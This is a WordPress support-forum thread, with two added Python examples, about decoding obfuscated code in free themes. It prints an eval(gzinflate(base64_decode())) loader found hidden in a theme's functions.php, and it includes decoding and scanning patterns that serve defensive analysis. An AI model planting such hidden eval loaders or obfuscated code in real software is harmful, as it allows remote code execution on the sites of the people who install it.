
[closed] Encrypted Theme? Here's how to decode it. (195 posts)

  1. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    siranthony: Both of those can be decoded with the tool at http://ottodestruct.com/decoder.php

  2. Themes from http://www.freewordpressthemes4u.com/ are all encoded.

    Once you decode, it doesn't reveal the actual (presumably paid) links in the footer. Still hunting those down. There are also 1x1 pixel graphics for them to track usage.

    Ooo hey, bonus points for name infringement in the domain name.

  3. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    andrea_r: While I'm not entirely sure what it's displaying, I can see a fair amount of danger here. Example from the functions.php:

    function lcmp_theme_options_end(){
        $s = get_settings( 'lcmp_lic' );
        if($s === FALSE || $s==''){
            global $option;
            if(file_exists($option)){
                $s = file_get_contents($option);
                update_option('lcmp_lic',$s);
            }
        }
        eval(gzinflate(base64_decode($s)));
    }
    add_action('wp_footer','lcmp_theme_options_end');

    This is designed to download an obfuscated file and execute it in the footer. From the naming, it appears to be a license display, sort of thing. However, it could download anything at all.

    I'm not able to find how it sets the global $option variable with the location of the file to download though.

    Just another reason to not use obfuscated themes at all.

  4. Yep, agreed.

    I'm mentioning it mostly so people can stay away.

  5. peterbra
    Member
    Posted 4 years ago #

    Guys,
    what kind of encryption is this?

    <?php $__FILE__=__FILE__;$__X__='WQzmUQumUCxkQzmUQumUWqyq _B(QTPMGU
    rl FoB srm FuurjBC mr kxBj DrttBsmn rs myxn qrnm.QTPMGU,QTPMGUjxnyuxnm-tBtEBoQTPMGU)U WQzmUQumU/CxkQzmUY';$bx=base64_decode("YmFzZTY0X2RlY29kZQ==");eval($bx('ZXZhbChzdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX19GSUxFX18uIiciLGh0bWxfZW50aXR5X2RlY29kZShzdHJ0cigkX19YX18sJ1pZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBenl4d3Z1dHNycXBvbm1sa2ppaGdmZWRjYmE5ODc2NTQzMjEwJgkkIzshPz4KPCcsJzwKPj8hOyMkCSYwMTIzNDU2Nzg5YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWicpLEVOVF9RVU9URVMpKSk7'));unset($__X__);unset($__FILE__); ?>

    How to decode this ?

  6. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    That was a tricky one. That decodes to this, oddly enough:

    ?><div><?php _e(&#039;ou are not allowed to view comments on this post.&#039;,&#039;wishlist-member&#039;); ?></div>>

  7. peterbra
    Member
    Posted 4 years ago #

    Otto,
    can you please share with me, step by step, how you decode this?
    Thanks a lot!

  8. Nakari
    Member
    Posted 4 years ago #

    My code starts with <?php eval(base64_decode( and then a bunch of rubbish. There's no str... or anything like that after the eval part. I tried 2 decoders - one gives me identical rubbish and one shows a bunch of little squares.
    Since I panicked I replaced footer.php with the original from WordPress, but that one is showing above the bottom line, so I'd really like to decode and fix the theme footer. Oh, and there were a bunch of links in the footer before I replaced it.

    Thanks for help.

  9. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    @peterbra: It's not hard. Same basic process as usual. Change "eval" to "echo" then run it, replacing the eval line progressively with the output produced by the run. Repeat a few times and voila.

    @Nakari: Change the "eval" to an "echo" and then run the code. That will decode it.

  10. VitaeBlog
    Member
    Posted 4 years ago #

    I made a post on this: http://wordpress.org/support/topic/320730?replies=1#post-1245292

    You won't need decoders or anything of the sort for it to work and it has never failed me so far :)

  11. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    @VitaeBlog: That method doesn't work, because all it gives you is the output of the final code. It doesn't give you any of the PHP code, which may contain conditional changes or other things along those lines. Merely producing a static set of HTML is not all that the code might be doing.

    A decoder is better. Not using that theme at all is best.

  12. Frumph
    Member
    Posted 4 years ago #

    wp-settings.php was hacked on a wp 2.8.4 site of a client of mine

    here's the decoded:

    http://pastebin.com/f67dd6b18

    Not sure how it was injected into wp-settings.php

    I used: http://www.rbl.jp/base64.php

    to decode it

  13. @mercime
    Volunteer Moderator
    Posted 4 years ago #

    Thanks Frumph, will be checking all wp-settings.php's in servers, geez.

    Per a recent post in Weblog Tools Collection there's a plugin, Theme Authenticity Checker (TAC), which could help you check themes for obfuscated code, which is not only in footer.php or functions.php but has in some cases been in index.php and page.php etc.

    I see good use of this for all - esp. in WPMU installs :-)

  14. Trevel
    Member
    Posted 4 years ago #

    I could really use some help. My theme's function.php has the encrypted text and I am struggling to decode it. Help is much appreciated!!!

    <?php
    if (function_exists('register_sidebar'))
    	register_sidebar(array(
    		'before_widget' => '<div class="content">',
    		'after_widget' => '</div>',
    		'before_title' => '<h4>',
    		'after_title' => '</h4>',
    	));
    ?>
    <?php eval(str_rot13('shapgvba purpx_urnqre(){vs(!(shapgvba_rkvfgf("purpx_shapgvbaf")&&shapgvba_rkvfgf("purpx_s_sbbgre"))){rpub(\'Guvf gurzr vf eryrnfrq haqre perngvir pbzzbaf yvprapr, nyy yvaxf va gur sbbgre fubhyq erznva vagnpg\');qvr;}}'));?>
    <?php eval(str_rot13('shapgvba purpx_sbbgre(){
    $y=\'Qrfvtarq ol <n uers="uggc://nqzveny-fpnssbyqvat.pb.hx">Ybaqba Fpnssbyqvat</n>.
    Pbqr ol <n uers="uggc://jjj.ovatbqnmmyr.pb.hx">Ovatb</n> |
    <n uers="uggc://jjj.ragercerarhepragre.bet">Ohfvarff oybt</n> |
    <n uers="uggc://jjj.fhttrfg-hey.bet">Ohfvarff Qverpgbel</n>.\';
    $s=qveanzr(__SVYR__).\'/sbbgre.cuc\';$sq=sbcra($s,\'e\');
    $p=sernq($sq,svyrfvmr($s));spybfr($sq);
    vs(fgecbf($p,$y)==0){rpub \'Guvf gurzr vf eryrnfrq haqre perngvir pbzzbaf yvprapr, nyy yvaxf va gur sbbgre fubhyq erznva vagnpg\';qvr;}}purpx_sbbgre();'));?>

  15. @mercime
    Volunteer Moderator
    Posted 4 years ago #

    Trevel, I used the eval(str_rot13 decoder (link in previous page) for the two strings:

    function check_header(){if(!(function_exists("check_functions")&&function_exists("check_f_footer"))){echo(\'This theme is released under creative commons licence, all links in the footer should remain intact\');die;}}
    
    function check_footer(){
    $l=\'Designed by <a href="alinkitookout">London Scaffolding</a>. Code by <a href="alinkitookout">Bingo</a> |
    <a href="alinkitookout">Business blog</a> |
    <a href="alinkitookout">Business Directory</a>.\';
    $f=dirname(__FILE__).\'/footer.php\';$fd=fopen($f,\'r\');
    $c=fread($fd,filesize($f));fclose($fd);
    if(strpos($c,$l)==0){echo \'This theme is released under creative commons licence, all links in the footer should remain intact\';die;}}check_footer();

    Double check your header.php and footer.php for encryptions as well.

  16. RichH
    Member
    Posted 4 years ago #

    peterbra asked what kind of encryption this is:

    <?php $__FILE__=__FILE__;$__X__='WQzmUQumUC...

    What tool does that? I need to do something to keep prying eyes out of a corporate configuration file.

  17. Xsecror
    Member
    Posted 4 years ago #

    Thank you for these links. Really helpful. I always wondered how to get rid of those encrypted footers.

  18. vacom
    Member
    Posted 4 years ago #

    naweedshams, thanks for your tips! It works for me! Thanks again :)

  19. digtialv
    Member
    Posted 4 years ago #

    Hi Otto and all.

    I have been busting my head with this one for some days now and I have to admit I'm not that savvy with these decoders.

    The code that I'm having trouble with: http://snipt.org/pVj

    I'm guessing that it's base64 encoded but I can't seem to decode it.

    I really appreciate all the help I can get.

    Thanks!

  20. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    digtialv: Boy, decoding that one is really annoying.

    Anyway, here:

    ?><?php global $options; foreach ($options as $value) { if (get_settings( $value['id'] ) === FALSE) { $$value['id'] = $value['std']; } else { $$value['id'] = get_settings( $value['id'] ); } } ?>
    
    <?php if ( $wp_chatter_features_on == 'yes' && $wp_chatter_home_posts_by_cat == 'yes' && $wp_chatter_feature_display == 'Display Separately' ) { ?>
    <?php include (TEMPLATEPATH . '/index2.php'); ?>
    <?php } elseif ( $wp_chatter_features_on == 'yes' && $wp_chatter_home_posts_by_cat == 'yes' && $wp_chatter_feature_display == 'Display in Glider' ) { ?>
    <?php include (TEMPLATEPATH . '/index3.php'); ?>
    <?php } elseif ( $wp_chatter_features_on == 'no' && $wp_chatter_home_posts_by_cat == 'yes' ) { ?>
    <?php include (TEMPLATEPATH . '/index3.php'); ?>
    <?php } else { ?>
    <?php include (TEMPLATEPATH . '/index1.php'); ?>
    <?php } ?>

  21. digtialv
    Member
    Posted 4 years ago #

    :-D How the h*** did you do it?
    Any tips you can give us for future problems on this type of encoding?

    Thank you so much Otto!!!

  22. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    Okay, basic process I used is this (large amounts of gibberish code omitted for brevity):

    1. Copy the code, put it into a php file.
    2. Use my text editor of choice (TextPad, because it groks regular expressions) to add newlines after every semi-colon. This makes it easier to see what the code is doing. That gives me this code:

    <?php $_F=__FILE__;
    $_X='PzNhP21a...Q/Mw==';
    $_D=strrev('edoced_46esab');
    eval($_D('JF9YPW...OyRfWD0wOw=='));
    ?>

    3. Change the eval to an echo and run the code. Resulting output was this:

    $_X=base64_decode($_X);$_X=strtr($_X,'O/bpuw3kM6B2txD1.RoX]lVY >JAEGTfz7K
    QH=js}ZqUce8v5nm<[9a4i0CrW{NghdILPySF','iC
    vfF>zeSE7P5nqlAt.wWDOmKubdU}=3M{Rkcx92JhLZgX06yrpQTG< VajIB1][Y48sH/oN');$_R=str
    _replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;

    This code basically does two things. First, it decodes the big $_X variable with base64_decode. Then, it uses strtr to replace the characters from the big main decoded string with another set of characters. It's a simple substitution code, basically. The letter "O" is replaced with the letter "i", and so forth. However, this set of strings contains two things of importance: line breaks. The breaks happen at weird places. So, I need to modify the code slightly to put those back in as \n characters. This also means I needed to change those strings from being in single quotes to being in double quotes. The result then replaces the "echo" line in the original code, but only that line.

    This is the resulting code (after once more adding line breaks after semi-colons, for readability):

    <?php $_F=__FILE__;
    $_X='PzNhP...0VDQ/Mw==';
    $_D=strrev('edoced_46esab');
    $_X=base64_decode($_X);
    $_X=strtr($_X,"O/bpuw3kM6B2txD1.RoX]lVY >JAEGTfz7K\nQH=js}ZqUce8v5nm<[9a4i0CrW{NghdILPySF","iC\nvfF>zeSE7P5nqlAt.wWDOmKubdU}=3M{Rkcx92JhLZgX06yrpQTG< VajIB1][Y48sH/oN");
    $_R=str_replace('__FILE__',"'".$_F."'",$_X);
    eval($_R);
    $_R=0;
    $_X=0;

    Change that eval to an echo again, and run it.

    Voila, there's your decoded code.
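
The "change eval to echo and run it" loop from posts 9 and 22, done statically as an added example (this is not Otto's code or anything from the thread): it finds eval() over a string literal, runs the decoder chain inside-out in Python instead of letting PHP execute the result, splices the text back in, and repeats. It stops where eval() takes a variable (as eval($_R) does above), so that strtr step is still done by hand, and it does not handle the strtr substitution layer at all. The three-layer sample at the end is constructed, not taken from the thread.

```python
import base64
import codecs
import re
import zlib
# Shapes shown in this thread, peeled inside-out without executing anything:
#   eval(base64_decode('..'))  eval(gzinflate(base64_decode('..')))  eval(str_rot13('..'))
#   $_D=strrev('edoced_46esab'); eval($_D('..'))   (strrev alias hiding base64_decode)
ALIAS_RE = re.compile(r"(\$\w+)\s*=\s*strrev\s*\(\s*'([^']*)'\s*\)")
EVAL_RE = re.compile(r"eval\s*\(\s*((?:\$?\w+\s*\(\s*)+)'((?:[^'\\]|\\.)*)'\s*\)+\s*;?")
NAME_RE = re.compile(r"\$?\w+")

DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda d: zlib.decompress(d, -15),  # raw DEFLATE, as PHP's gzinflate
    "str_rot13": lambda d: codecs.encode(d.decode("latin-1"), "rot_13").encode("latin-1"),
    "strrev": lambda d: d[::-1],
}

def _unquote(literal):
    # PHP single-quoted literal: only \' and \\ are escape sequences
    return re.sub(r"\\(['\\])", r"\1", literal).encode("utf-8")

def peel_once(src):
    """Replace the first eval(chain('literal')) with the text it would have run; None if absent."""
    aliases = {m.group(1): m.group(2)[::-1] for m in ALIAS_RE.finditer(src)}
    m = EVAL_RE.search(src)
    if m is None:
        return None
    chain = [aliases.get(n, n) for n in NAME_RE.findall(m.group(1))]
    data = _unquote(m.group(2))
    for name in reversed(chain):  # innermost call runs first
        if name not in DECODERS:
            raise ValueError("unsupported decoder: " + name)
        data = DECODERS[name](data)
    return src[:m.start()] + data.decode("utf-8", "replace") + src[m.end():]

def peel_all(src, max_layers=10):
    """Peel until no eval() over a literal is left; eval($var) stops it, as on this page."""
    for _ in range(max_layers):
        nxt = peel_once(src)
        if nxt is None:
            break
        src = nxt
    return src

# Constructed three-layer sample (not from the thread): rot13 inside raw DEFLATE inside
# base64, with base64_decode hidden behind the strrev alias; the rot13 text decodes to echo.
_inner = "eval(str_rot13('rpub \\'yvaxf zhfg erznva\\';'));"
_co = zlib.compressobj(wbits=-15)
SAMPLE = ("<?php $_D=strrev('edoced_46esab'); eval(gzinflate($_D('"
          + base64.b64encode(_co.compress(_inner.encode()) + _co.flush()).decode() + "'))); ?>")
```

Running peel_all(SAMPLE) leaves the strrev alias line in place and replaces the eval() with the plain echo statement it would have executed.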

  23. mikerudd27
    Member
    Posted 4 years ago #

    Hey Otto got another one for you.. have a look at the footer on the site: http://www.launified.info

    Thanks so much!

    code removed by mod

  24. mikerudd27
    Member
    Posted 4 years ago #

    I have another too..

    code removed by mod

  25. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    mikerudd27, please don't post that sort of large code on these forums. Small pieces is fine, but large chunks should be posted on a pastebin type site and the link posted here. We tend to use http://wordpress.pastebin.com for that sort of thing.

    The very first post in this thread has a link to a decoder explicitly designed for your first bit of code: http://www.tareeinternet.com/scripts/decrypt.php

    The second piece you posted wasn't code at all, it was an image that was embedded using the data: URL scheme.

  26. mikerudd27
    Member
    Posted 4 years ago #

    sorry. thanks for your support!

  27. avstu
    Member
    Posted 4 years ago #

    I've tried all the decoders above but can't seem to find one that works. Any suggestions?

    eval(base64_decode('Pz4gPGRpdiBpZD0iZm9vdGVyIj4NCjxwPjw/cGhwIHRoZV90aW1lKCdZJyk7ID8+IDw/cGhwIGJsb2dpbmZvKCduYW1lJyk7ID8+LiAgV29yZFByZXNzLjxhIGhyZWY9Imh0dHA6Ly93d3cuZW1haWxtYXJrZXRpbmdkaWdlc3QuY29tLyIgdGl0bGU9IkVtYWlsIG1hcmtldGluZyI+RW1haWwgbWFya2V0aW5nPC9hPjwvcD4NCjwvZGl2Pg0KDQoNCjw/cGhwIHdwX2Zvb3RlcigpOyA/Pg0KDQo8L2JvZHk+DQo8L2h0bWw+IDw/'));

  28. amfpg
    Member
    Posted 4 years ago #

    Hi Otto, I tried your suggestion to change the eval to echo and ran this file from the PHP command line

    <?php eval(base64_decode('Pz4gPGRpdiBpZD0iZm9vdGVyLWhvbGRlciI+DQogIDxkaXYgY2xhc3M9ImZvb3RlciI+PC9kaXY+DQogIDxkaXYgY2xhc3M9InR4dCI+DQogICAgPD9waHAgcXVlcnlfcG9zdHMoJ3BhZ2VuYW1lPWFib3V0Jyk7ID8+DQogICAgPD9waHAgaWYgKGhhdmVfcG9zdHMoKSkgOiA/Pg0KICAgIDw/cGhwIHdoaWxlIChoYXZlX3Bvc3RzKCkpIDogdGhlX3Bvc3QoKTsgPz4NCiAgICA8P3BocCB0aGVfY29udGVudCgpOyA/Pg0KICAgIDw/cGhwIGVuZHdoaWxlOyA/Pg0KICAgIDw/cGhwIGVuZGlmOyA/Pg0KICA8L2Rpdj4NCiAgIDxhIGhyZWY9Imh0dHA6Ly9lbWFpbC1yZXNwb25kZXIubmV0LyIgdGl0bGU9IkVtYWlsIGF1dG9yZXNwb25kZXIiPkVtYWlsIGF1dG9yZXNwb25kZXI8L2E+IDwvZGl2Pg0KPD9waHAgd3BfZm9vdGVyKCk7ID8+DQo8L2JvZHk+PC9odG1sPiA8Pw=='));?>

    and I got this

    <div id="footer-holder">
      <div class="footer"></div>
      <div class="txt">
        <?php query_posts('pagename=about'); ?>
        <?php if (have_posts()) : ?>
        <?php while (have_posts()) : the_post(); ?>
        <?php the_content(); ?>
        <?php endwhile; ?>
        <?php endif; ?>
      </div>
       <a href="http://email-responder.net/" title="Email autoresponder">Email autoresponder</a> </div>
    <?php wp_footer(); ?>
    </body></html>

    Is this the correct result?

    thx

  29. amfpg
    Member
    Posted 4 years ago #

    Another question: how do I know if another file has encoded text?
    I downloaded a theme and found that footer.php has a line with the word eval.

    For the other files, how do I check?
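
One way to check the rest of a theme, as an added example that is not from the thread and not the TAC plugin mentioned earlier: a Python scanner over the indicators this thread has shown so far, namely eval() fed by base64_decode/gzinflate/str_rot13, the strrev('edoced_46esab') alias, eval() of a variable or aliased callee, long single-quoted base64 blobs and 1x1 tracking images, while skipping data: inline images because those are not code. The sample theme files are constructed; the functions.php lines mirror the snippet from post 3.

```python
import re

# Indicators drawn from this thread: eval() fed by a decoder or by a variable/aliased callee,
# strrev() hiding a function name, long base64-looking literals, and 1x1 tracking images.
DECODER_NAMES = {"base64_decode", "gzinflate", "str_rot13", "strrev"}
RULES = [
    ("eval_of_decoder", re.compile(r"eval\s*\(\s*(?:\$?\w+\s*\(\s*)*(?:"
                                   + "|".join(sorted(DECODER_NAMES)) + r")\s*\(")),
    ("eval_of_variable_or_alias", re.compile(r"eval\s*\(\s*\$\w+\s*[(),]")),
    ("reversed_function_name", re.compile(r"strrev\s*\(\s*'(\w+)'\s*\)")),
    ("long_base64_literal", re.compile(r"'[A-Za-z0-9+/=\s]{200,}'")),
]
IMG_TAG = re.compile(r"<img\b[^>]*>", re.I)
ATTR = re.compile(r"(\w+)\s*=\s*[\"']?([^\"'\s>]+)")
DATA_URI = re.compile(r"data:image/", re.I)

def scan_source(path, text):
    """Return (path, line_no, rule) for every suspicious line of one theme file."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES:
            m = rx.search(line)
            if m is None:
                continue
            if rule == "reversed_function_name" and m.group(1)[::-1] not in DECODER_NAMES:
                continue  # strrev() of an ordinary string is not an indicator by itself
            if rule == "long_base64_literal" and DATA_URI.search(line):
                continue  # an inline image, not code (the second case in post 25)
            findings.append((path, no, rule))
        for tag in IMG_TAG.findall(line):
            attrs = {k.lower(): v for k, v in ATTR.findall(tag)}
            if attrs.get("width") == "1" and attrs.get("height") == "1":
                findings.append((path, no, "tracking_pixel"))
    return findings

def scan_theme(files):
    """files: {relative path: source text}; findings come back sorted by path and line."""
    return sorted(f for path, text in files.items() for f in scan_source(path, text))

# Constructed sample theme, not a real one; the functions.php lines mirror post 3.
SAMPLE_THEME = {
    "functions.php": "<?php\n$s = get_settings( 'lcmp_lic' );\neval(gzinflate(base64_decode($s)));\n",
    "footer.php": "<?php eval(base64_decode('Pz4gPGRpdj5mb290ZXI8L2Rpdj4='));?>\n"
                  "<img src=\"http://tracker.invalid/p.gif\" width=\"1\" height=\"1\" alt=\"\">\n",
    "header.php": "<?php $_D=strrev('edoced_46esab');\neval($_D('Pz4gaGk='));\n",
    "index.php": "<?php get_header(); ?>\n<img src=\"logo.png\" width=\"120\" height=\"40\">\n"
                 "<?php echo '<img src=\"data:image/gif;base64,' . '" + "R0lG" * 60 + "' . '\">'; ?>\n",
}
```

Anything the scanner flags is a candidate for decoding, not proof of malice; a hit on eval() of a variable (as in post 3) means the payload is fetched at runtime and cannot be judged from the file alone.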

  30. danalingga
    Member
    Posted 4 years ago #

    Great tools, now I can decode all the encrypted theme code so I know what exactly the code is. Thanks.

Topic Closed

This topic has been closed to new replies.
